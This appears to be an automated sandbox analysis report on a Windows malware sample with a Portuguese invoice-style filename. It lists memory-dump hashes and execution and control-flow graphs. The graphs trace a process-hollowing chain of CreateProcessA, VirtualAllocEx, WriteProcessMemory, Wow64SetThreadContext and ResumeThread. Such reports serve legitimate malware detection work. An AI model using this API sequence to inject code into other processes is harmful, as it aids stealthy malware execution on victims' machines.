                                              • Source File: 0000000B.00000002.1628121773.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_ff0000_PROFORMA + PENDENTES.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: de9ece18f98bd801eb5b3a9480474b9d3e5e28094fdd036974a94927671e5717
                                              • Instruction ID: 362ead112d875f50da7d3c34b3c3afe943ce209340ce9de3a4aaed8335ef78bb
                                              • Opcode Fuzzy Hash: de9ece18f98bd801eb5b3a9480474b9d3e5e28094fdd036974a94927671e5717
                                              • Instruction Fuzzy Hash: 14C0123150030947D515FB75ED45925332E77C0600F405D50B5090B61DEF7C5A444792

                                              Execution Graph

                                              Execution Coverage:9.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:183
                                              Total number of Limit Nodes:12
                                              execution_graph 35351 5f4cec6 35352 5f4ce70 35351->35352 35353 5f4d1ba 35352->35353 35357 5f4e240 35352->35357 35374 5f4e29e 35352->35374 35393 5f4e231 35352->35393 35358 5f4e25a 35357->35358 35410 5f4ea54 35358->35410 35418 5f4e649 35358->35418 35424 5f4e768 35358->35424 35429 5f4e7ef 35358->35429 35437 5f4e745 35358->35437 35441 5f4e95a 35358->35441 35446 5f4e7fe 35358->35446 35450 5f4ebd2 35358->35450 35455 5f4eb12 35358->35455 35460 5f4ec11 35358->35460 35465 5f4e551 35358->35465 35471 5f4e610 35358->35471 35476 5f4ef75 35358->35476 35480 5f4e9b4 35358->35480 35359 5f4e27e 35359->35352 35376 5f4e22c 35374->35376 35377 5f4e2a1 35374->35377 35375 5f4e1ce 35375->35352 35376->35375 35379 5f4ea54 4 API calls 35376->35379 35380 5f4e9b4 2 API calls 35376->35380 35381 5f4ef75 2 API calls 35376->35381 35382 5f4e610 2 API calls 35376->35382 35383 5f4e551 2 API calls 35376->35383 35384 5f4ec11 2 API calls 35376->35384 35385 5f4eb12 2 API calls 35376->35385 35386 5f4ebd2 2 API calls 35376->35386 35387 5f4e7fe 2 API calls 35376->35387 35388 5f4e95a 2 API calls 35376->35388 35389 5f4e745 2 API calls 35376->35389 35390 5f4e7ef 4 API calls 35376->35390 35391 5f4e768 2 API calls 35376->35391 35392 5f4e649 2 API calls 35376->35392 35377->35352 35378 5f4e27e 35378->35352 35379->35378 35380->35378 35381->35378 35382->35378 35383->35378 35384->35378 35385->35378 35386->35378 35387->35378 35388->35378 35389->35378 35390->35378 35391->35378 35392->35378 35394 5f4e240 35393->35394 35396 5f4ea54 4 API calls 35394->35396 35397 5f4e9b4 2 API calls 35394->35397 35398 5f4ef75 2 API calls 35394->35398 35399 5f4e610 2 API calls 35394->35399 35400 5f4e551 2 API calls 35394->35400 35401 5f4ec11 2 API calls 35394->35401 35402 5f4eb12 2 API calls 35394->35402 35403 5f4ebd2 2 API calls 35394->35403 35404 5f4e7fe 2 API calls 35394->35404 35405 5f4e95a 2 API calls 35394->35405 35406 5f4e745 2 API calls 35394->35406 35407 5f4e7ef 4 API calls 35394->35407 35408 5f4e768 2 API calls 35394->35408 35409 5f4e649 2 API calls 35394->35409 35395 5f4e27e 35395->35352 35396->35395 35397->35395 35398->35395 35399->35395 35400->35395 35401->35395 35402->35395 35403->35395 35404->35395 35405->35395 35406->35395 35407->35395 35408->35395 35409->35395 35411 5f4ea5d 35410->35411 35412 5f4ea63 35410->35412 35411->35412 35485 5f4c1f0 35411->35485 35489 5f4c1e9 35411->35489 35493 5f4c8b0 35412->35493 35497 5f4c8a8 35412->35497 35413 5f4f126 35420 5f4e619 35418->35420 35419 5f4e6c1 35419->35359 35420->35419 35501 5f4ca3c 35420->35501 35505 5f4ca48 35420->35505 35425 5f4e77f 35424->35425 35509 5f4c7c0 35425->35509 35513 5f4c7b8 35425->35513 35426 5f4ee82 35430 5f4e864 35429->35430 35433 5f4c1f0 Wow64SetThreadContext 35430->35433 35434 5f4c1e9 Wow64SetThreadContext 35430->35434 35431 5f4e74e 35432 5f4e8c6 35431->35432 35517 5f4c700 35431->35517 35521 5f4c6f8 35431->35521 35433->35431 35434->35431 35438 5f4e74e 35437->35438 35439 5f4c700 VirtualAllocEx 35438->35439 35440 5f4c6f8 VirtualAllocEx 35438->35440 35439->35438 35440->35438 35442 5f4e972 35441->35442 35525 5f4bd00 35442->35525 35529 5f4bd08 35442->35529 35443 5f4e987 35443->35359 35447 5f4e74e 35446->35447 35447->35446 35448 5f4c700 VirtualAllocEx 35447->35448 35449 5f4c6f8 VirtualAllocEx 35447->35449 35448->35447 35449->35447 35451 5f4e972 35450->35451 35452 5f4e987 35451->35452 35453 5f4bd00 ResumeThread 35451->35453 35454 5f4bd08 ResumeThread 35451->35454 35452->35359 35453->35452 35454->35452 35456 5f4ea63 35455->35456 35458 5f4c8b0 ReadProcessMemory 35456->35458 35459 5f4c8a8 ReadProcessMemory 35456->35459 35457 5f4f126 35458->35457 35459->35457 35463 5f4c7c0 WriteProcessMemory 35460->35463 35464 5f4c7b8 WriteProcessMemory 35460->35464 35461 5f4ebc6 35461->35460 35462 5f4e825 35461->35462 35462->35359 35463->35461 35464->35461 35467 5f4e593 35465->35467 35466 5f4e6c1 35466->35359 35467->35466 35469 5f4ca3c CreateProcessA 35467->35469 35470 5f4ca48 CreateProcessA 35467->35470 35468 5f4e726 35468->35359 35469->35468 35470->35468 35472 5f4e619 35471->35472 35474 5f4ca3c CreateProcessA 35472->35474 35475 5f4ca48 CreateProcessA 35472->35475 35473 5f4e726 35473->35359 35474->35473 35475->35473 35477 5f4e74e 35476->35477 35478 5f4c700 VirtualAllocEx 35477->35478 35479 5f4c6f8 VirtualAllocEx 35477->35479 35478->35477 35479->35477 35481 5f4e9f9 35480->35481 35483 5f4c7c0 WriteProcessMemory 35481->35483 35484 5f4c7b8 WriteProcessMemory 35481->35484 35482 5f4ea9a 35483->35482 35484->35482 35486 5f4c235 Wow64SetThreadContext 35485->35486 35488 5f4c27d 35486->35488 35488->35412 35490 5f4c1f0 Wow64SetThreadContext 35489->35490 35492 5f4c27d 35490->35492 35492->35412 35494 5f4c8fb ReadProcessMemory 35493->35494 35496 5f4c93f 35494->35496 35496->35413 35498 5f4c8b0 ReadProcessMemory 35497->35498 35500 5f4c93f 35498->35500 35500->35413 35502 5f4ca48 CreateProcessA 35501->35502 35504 5f4cc93 35502->35504 35504->35504 35506 5f4cad1 CreateProcessA 35505->35506 35508 5f4cc93 35506->35508 35508->35508 35510 5f4c808 WriteProcessMemory 35509->35510 35512 5f4c85f 35510->35512 35512->35426 35514 5f4c7c0 WriteProcessMemory 35513->35514 35516 5f4c85f 35514->35516 35516->35426 35518 5f4c740 VirtualAllocEx 35517->35518 35520 5f4c77d 35518->35520 35520->35431 35522 5f4c700 VirtualAllocEx 35521->35522 35524 5f4c77d 35522->35524 35524->35431 35526 5f4bd08 ResumeThread 35525->35526 35528 5f4bd79 35526->35528 35528->35443 35530 5f4bd48 ResumeThread 35529->35530 35532 5f4bd79 35530->35532 35532->35443 35340 e4c300 35341 e4c342 35340->35341 35342 e4c348 GetModuleHandleW 35340->35342 35341->35342 35343 e4c375 35342->35343 35313 e44668 35314 e44672 35313->35314 35317 e44763 35313->35317 35322 e44759 35313->35322 35318 e4477d 35317->35318 35328 e44868 35318->35328 35332 e44859 35318->35332 35319 e44787 35319->35314 35323 e44763 CreateActCtxA 35322->35323 35324 e4475f 35323->35324 35326 e44868 CreateActCtxA 35324->35326 35327 e44859 CreateActCtxA 35324->35327 35325 e44787 35325->35314 35326->35325 35327->35325 35330 e4488f 35328->35330 35329 e4496c 35329->35329 35330->35329 35336 e444d4 35330->35336 35333 e4485f 35332->35333 35334 e444d4 CreateActCtxA 35333->35334 35335 e4496c 35333->35335 35334->35335 35337 e458f8 CreateActCtxA 35336->35337 35339 e459bb 35337->35339 35344 5f4f418 35345 5f4f5a3 35344->35345 35347 5f4f43e 35344->35347 35347->35345 35348 5f49398 35347->35348 35349 5f4f698 PostMessageW 35348->35349 35350 5f4f704 35349->35350 35350->35347 35533 e4e398 35534 e4e3de 35533->35534 35537 e4e578 35534->35537 35540 e4dc70 35537->35540 35541 e4e5e0 DuplicateHandle 35540->35541 35542 e4e4cb 35541->35542 35543 5f4cf4b 35545 5f4cef0 35543->35545 35544 5f4d1ba 35545->35544 35546 5f4e240 12 API calls 35545->35546 35547 5f4e231 12 API calls 35545->35547 35548 5f4e29e 12 API calls 35545->35548 35546->35545 35547->35545 35548->35545
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560407844.0000000005CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5cf0000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf6c76c7925c08287f63aedf23dbb04b6ba7fd5a6aa47b4babe0810cb810d85b
                                              • Instruction ID: 7e4a8c2d8e6664fb1087a8c8ef77c4dbf0280197bbccf0f102b3901ae24a372f
                                              • Opcode Fuzzy Hash: bf6c76c7925c08287f63aedf23dbb04b6ba7fd5a6aa47b4babe0810cb810d85b
                                              • Instruction Fuzzy Hash: 72E1C834A04306DFDB94CF6AD444AAE7BB6BF85300B158869D506EB361DB31ED41CB91
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1562426032.000000000A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_a650000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bfd0afe28fc1985f53809d5052459b5761a0984eeeb42ea7684f6a875614f4db
                                              • Instruction ID: 547f710a2e112a43c1e25affea619d54b3ed45a8564502ca0ef3a2719794d857
                                              • Opcode Fuzzy Hash: bfd0afe28fc1985f53809d5052459b5761a0984eeeb42ea7684f6a875614f4db
                                              • Instruction Fuzzy Hash: 91C19A71B016048FDB29EFB5C460B6EB7FAAF88700F15846ED9469B791CB39E801CB51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 35 5f4ca3c-5f4cadd 38 5f4cb16-5f4cb36 35->38 39 5f4cadf-5f4cae9 35->39 46 5f4cb6f-5f4cb9e 38->46 47 5f4cb38-5f4cb42 38->47 39->38 40 5f4caeb-5f4caed 39->40 41 5f4cb10-5f4cb13 40->41 42 5f4caef-5f4caf9 40->42 41->38 44 5f4cafd-5f4cb0c 42->44 45 5f4cafb 42->45 44->44 48 5f4cb0e 44->48 45->44 53 5f4cbd7-5f4cc91 CreateProcessA 46->53 54 5f4cba0-5f4cbaa 46->54 47->46 49 5f4cb44-5f4cb46 47->49 48->41 51 5f4cb48-5f4cb52 49->51 52 5f4cb69-5f4cb6c 49->52 55 5f4cb54 51->55 56 5f4cb56-5f4cb65 51->56 52->46 67 5f4cc93-5f4cc99 53->67 68 5f4cc9a-5f4cd20 53->68 54->53 57 5f4cbac-5f4cbae 54->57 55->56 56->56 58 5f4cb67 56->58 59 5f4cbb0-5f4cbba 57->59 60 5f4cbd1-5f4cbd4 57->60 58->52 62 5f4cbbc 59->62 63 5f4cbbe-5f4cbcd 59->63 60->53 62->63 63->63 64 5f4cbcf 63->64 64->60 67->68 78 5f4cd30-5f4cd34 68->78 79 5f4cd22-5f4cd26 68->79 81 5f4cd44-5f4cd48 78->81 82 5f4cd36-5f4cd3a 78->82 79->78 80 5f4cd28 79->80 80->78 84 5f4cd58-5f4cd5c 81->84 85 5f4cd4a-5f4cd4e 81->85 82->81 83 5f4cd3c 82->83 83->81 87 5f4cd6e-5f4cd75 84->87 88 5f4cd5e-5f4cd64 84->88 85->84 86 5f4cd50 85->86 86->84 89 5f4cd77-5f4cd86 87->89 90 5f4cd8c 87->90 88->87 89->90 92 5f4cd8d 90->92 92->92
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F4CC7E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 337f1e52405b5083c24500978236735c88b54f8b535f029be9a78ebdc0832439
                                              • Instruction ID: 73b053ec4dc2c2e962330624c1dd8c43912446160ce0a7d89a4d44ae2f4b714c
                                              • Opcode Fuzzy Hash: 337f1e52405b5083c24500978236735c88b54f8b535f029be9a78ebdc0832439
                                              • Instruction Fuzzy Hash: BDA17C71D01319DFEB10DFA8C841BEEBBB2BF44710F0481AAD859A7240DB789985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 93 5f4ca48-5f4cadd 95 5f4cb16-5f4cb36 93->95 96 5f4cadf-5f4cae9 93->96 103 5f4cb6f-5f4cb9e 95->103 104 5f4cb38-5f4cb42 95->104 96->95 97 5f4caeb-5f4caed 96->97 98 5f4cb10-5f4cb13 97->98 99 5f4caef-5f4caf9 97->99 98->95 101 5f4cafd-5f4cb0c 99->101 102 5f4cafb 99->102 101->101 105 5f4cb0e 101->105 102->101 110 5f4cbd7-5f4cc91 CreateProcessA 103->110 111 5f4cba0-5f4cbaa 103->111 104->103 106 5f4cb44-5f4cb46 104->106 105->98 108 5f4cb48-5f4cb52 106->108 109 5f4cb69-5f4cb6c 106->109 112 5f4cb54 108->112 113 5f4cb56-5f4cb65 108->113 109->103 124 5f4cc93-5f4cc99 110->124 125 5f4cc9a-5f4cd20 110->125 111->110 114 5f4cbac-5f4cbae 111->114 112->113 113->113 115 5f4cb67 113->115 116 5f4cbb0-5f4cbba 114->116 117 5f4cbd1-5f4cbd4 114->117 115->109 119 5f4cbbc 116->119 120 5f4cbbe-5f4cbcd 116->120 117->110 119->120 120->120 121 5f4cbcf 120->121 121->117 124->125 135 5f4cd30-5f4cd34 125->135 136 5f4cd22-5f4cd26 125->136 138 5f4cd44-5f4cd48 135->138 139 5f4cd36-5f4cd3a 135->139 136->135 137 5f4cd28 136->137 137->135 141 5f4cd58-5f4cd5c 138->141 142 5f4cd4a-5f4cd4e 138->142 139->138 140 5f4cd3c 139->140 140->138 144 5f4cd6e-5f4cd75 141->144 145 5f4cd5e-5f4cd64 141->145 142->141 143 5f4cd50 142->143 143->141 146 5f4cd77-5f4cd86 144->146 147 5f4cd8c 144->147 145->144 146->147 149 5f4cd8d 147->149 149->149
                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05F4CC7E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 4b6717220405eeefca069d4ff050977c6914a51386ef2cb9866f3d4e8e6e6d81
                                              • Instruction ID: 4a95853998eaa7cb4861eaa22c41562169906f18a4b9a0268d5baf67888c4824
                                              • Opcode Fuzzy Hash: 4b6717220405eeefca069d4ff050977c6914a51386ef2cb9866f3d4e8e6e6d81
                                              • Instruction Fuzzy Hash: C2917C71D01319DFEB10DFA8C841BEEBBB2BF48710F1481A9D819A7240DB789985CF91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 150 e444d4-e459b9 CreateActCtxA 153 e459c2-e45a1c 150->153 154 e459bb-e459c1 150->154 161 e45a1e-e45a21 153->161 162 e45a2b-e45a2f 153->162 154->153 161->162 163 e45a40 162->163 164 e45a31-e45a3d 162->164 166 e45a41 163->166 164->163 166->166
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E459A9
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 8f104ad7a730f853ad148978642b506b4650bd0f671bd93a729affbb6ed63b41
                                              • Instruction ID: 2687ea493f0af0ba82bace8695ee033a43de7e0bdaefd9096f42da6a18689af1
                                              • Opcode Fuzzy Hash: 8f104ad7a730f853ad148978642b506b4650bd0f671bd93a729affbb6ed63b41
                                              • Instruction Fuzzy Hash: 8F41CFB1C00719CBDB24DFA9C844B9EBBF5BF88704F20816AD419AB251DB75694ACF90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 167 e458ec-e458f1 168 e458f7-e459b9 CreateActCtxA 167->168 170 e459c2-e45a1c 168->170 171 e459bb-e459c1 168->171 178 e45a1e-e45a21 170->178 179 e45a2b-e45a2f 170->179 171->170 178->179 180 e45a40 179->180 181 e45a31-e45a3d 179->181 183 e45a41 180->183 181->180 183->183
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00E459A9
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: b5c8816b85c64a3299978142bc7daff3d6ed69c04588d14e21bb0aa805354e3a
                                              • Instruction ID: b2d2d2f43ba1f093121a5dbcb6bb42d267c47c5c5fdca318a94cf128db56626e
                                              • Opcode Fuzzy Hash: b5c8816b85c64a3299978142bc7daff3d6ed69c04588d14e21bb0aa805354e3a
                                              • Instruction Fuzzy Hash: EE41E2B1C00719CFDB24DFA9C8847CEBBB1BF88714F20816AD419AB291DB756946CF50

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 184 5f4c7b8-5f4c80e 187 5f4c810-5f4c81c 184->187 188 5f4c81e-5f4c85d WriteProcessMemory 184->188 187->188 190 5f4c866-5f4c896 188->190 191 5f4c85f-5f4c865 188->191 191->190
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F4C850
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 2f92606419c70f6005ff0322475559aed87e188c9e2c5b317427da5b729d68ae
                                              • Instruction ID: b185022510080328fe7b9b5de5926dcebbe6854492168f742439b8fc7182f1c7
                                              • Opcode Fuzzy Hash: 2f92606419c70f6005ff0322475559aed87e188c9e2c5b317427da5b729d68ae
                                              • Instruction Fuzzy Hash: 952115B19013499FDB10DFAAC885BDEBBF5FF48710F14842AE959A7240C7789940DFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 195 5f4c7c0-5f4c80e 197 5f4c810-5f4c81c 195->197 198 5f4c81e-5f4c85d WriteProcessMemory 195->198 197->198 200 5f4c866-5f4c896 198->200 201 5f4c85f-5f4c865 198->201 201->200
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05F4C850
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: e1dda9aed8c3869968240442a4cdafaf24b11558013ea6b973cbc62c27d517ba
                                              • Instruction ID: d5e9013be078fee13a11e1e68dfbfafb110e140184c7fe7a81db9f8c6761e335
                                              • Opcode Fuzzy Hash: e1dda9aed8c3869968240442a4cdafaf24b11558013ea6b973cbc62c27d517ba
                                              • Instruction Fuzzy Hash: D22115719003499FDB10DFAAC884BDEBBF5FF48310F10842AE919A7240C7789940CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 205 5f4c8a8-5f4c93d ReadProcessMemory 209 5f4c946-5f4c976 205->209 210 5f4c93f-5f4c945 205->210 210->209
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F4C930
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 08025740c7767431d2b941b50a4f297b2b74afb5f9658d93ed1e78c58d515185
                                              • Instruction ID: 00e5e5bd832e294317fa12f37710d5b7c8be3787c8f3d790c776f159b2086783
                                              • Opcode Fuzzy Hash: 08025740c7767431d2b941b50a4f297b2b74afb5f9658d93ed1e78c58d515185
                                              • Instruction Fuzzy Hash: CB2105B1C007499FDB10DFAAC884AEEBBF5FF48320F50842AE519A7250C7799940CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 220 5f4c1e9-5f4c23b 223 5f4c23d-5f4c249 220->223 224 5f4c24b-5f4c27b Wow64SetThreadContext 220->224 223->224 226 5f4c284-5f4c2b4 224->226 227 5f4c27d-5f4c283 224->227 227->226
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F4C26E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: d5e3fa8d8c392deb646adc8185daedea75d892f68eac787b931960f248fb2a36
                                              • Instruction ID: 8c3a8638abe99a6ba5fb1b1af8c81c02f92056cea81488532c2518d2d1e6945a
                                              • Opcode Fuzzy Hash: d5e3fa8d8c392deb646adc8185daedea75d892f68eac787b931960f248fb2a36
                                              • Instruction Fuzzy Hash: FF213AB1D007099FDB10DFAAC8857EEBBF5EF48714F148429D419A7240D7789945CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 214 e4dc70-e4e674 DuplicateHandle 216 e4e676-e4e67c 214->216 217 e4e67d-e4e69a 214->217 216->217
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E4E5A6,?,?,?,?,?), ref: 00E4E667
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1545982477.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_e40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 538befbf44bca48fcb2b4775bb9886d8afbfa9a18ee51b768213b0c9b69fc31c
                                              • Instruction ID: 64730034a5942ada526cc9bf93fd4a12876c17cd4254dae142d752a9f9e59c57
                                              • Opcode Fuzzy Hash: 538befbf44bca48fcb2b4775bb9886d8afbfa9a18ee51b768213b0c9b69fc31c
                                              • Instruction Fuzzy Hash: 0521E3B59002489FDB10CFAAD884ADEBBF9FB48310F14841AE918A7350D378A940CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 231 5f4c1f0-5f4c23b 233 5f4c23d-5f4c249 231->233 234 5f4c24b-5f4c27b Wow64SetThreadContext 231->234 233->234 236 5f4c284-5f4c2b4 234->236 237 5f4c27d-5f4c283 234->237 237->236
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05F4C26E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 06c291a1d5a3f232735c491280272267ffafdc5d4f107f94c7c931bf33086c55
                                              • Instruction ID: e71fc3d94022289cc3b4a1039d3f3ea8c2c6dcf2b59f5784c07b18a15b77d342
                                              • Opcode Fuzzy Hash: 06c291a1d5a3f232735c491280272267ffafdc5d4f107f94c7c931bf33086c55
                                              • Instruction Fuzzy Hash: 49211871D007098FDB10DFAAC8857EEBBF5EF48324F14842AD419A7240CB789945CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 241 5f4c8b0-5f4c93d ReadProcessMemory 244 5f4c946-5f4c976 241->244 245 5f4c93f-5f4c945 241->245 245->244
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05F4C930
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: cc50e2a66d6e454f6303cca71960f6a9ceee312e71fe06cfedb444cbf0fffe72
                                              • Instruction ID: 1931121d98ff031b2ef7b4e6b3fe054323fdc067dda07e81a085e8889d74e06b
                                              • Opcode Fuzzy Hash: cc50e2a66d6e454f6303cca71960f6a9ceee312e71fe06cfedb444cbf0fffe72
                                              • Instruction Fuzzy Hash: 432116B18007499FDB10DFAAC884BEEBBF5FF48320F10842AE519A7250C7799940CFA4

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 249 5f4c6f8-5f4c77b VirtualAllocEx 253 5f4c784-5f4c7a9 249->253 254 5f4c77d-5f4c783 249->254 254->253
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F4C76E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 7b48837a6d45b74f4f6c7631e77beae774ad6b7f6fe7c2dc7468bc5b36f997ef
                                              • Instruction ID: 3beb790c32af13bf32f634d32bb72a6323495e276d64913d346007e5d10bc6be
                                              • Opcode Fuzzy Hash: 7b48837a6d45b74f4f6c7631e77beae774ad6b7f6fe7c2dc7468bc5b36f997ef
                                              • Instruction Fuzzy Hash: EE1114769003489FDB10DFAAC845BDFBBF5EF88724F148819E925A7250C779A940CFA1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 258 5f4c700-5f4c77b VirtualAllocEx 261 5f4c784-5f4c7a9 258->261 262 5f4c77d-5f4c783 258->262 262->261
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05F4C76E
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_5f40000_WYqxTmjfOgdZ.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: c5db9aba19ffddeaabd401f3e30246fe9aac7fc787d3e57140ab07e4cd211693
                                              • Instruction ID: 569ba58a1a6f9585b0d8a9986a6b9fa5ad80130a346c5a13facb967eddeac7b3
                                              • Opcode Fuzzy Hash: c5db9aba19ffddeaabd401f3e30246fe9aac7fc787d3e57140ab07e4cd211693
                                              • Instruction Fuzzy Hash: 9B1114758002489FDB10DFAAC844BDFBBF5EF88720F148819E525A7250C779A940CFA0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 266 5f4bd00-5f4bd77 ResumeThread 270 5f4bd80-5f4bda5 266->270 271 5f4bd79-5f4bd7f 266->271 271->270
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1560705132.0000000005F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F40000, based on PE: false
                                              Joe Sandbox IDA Plugin
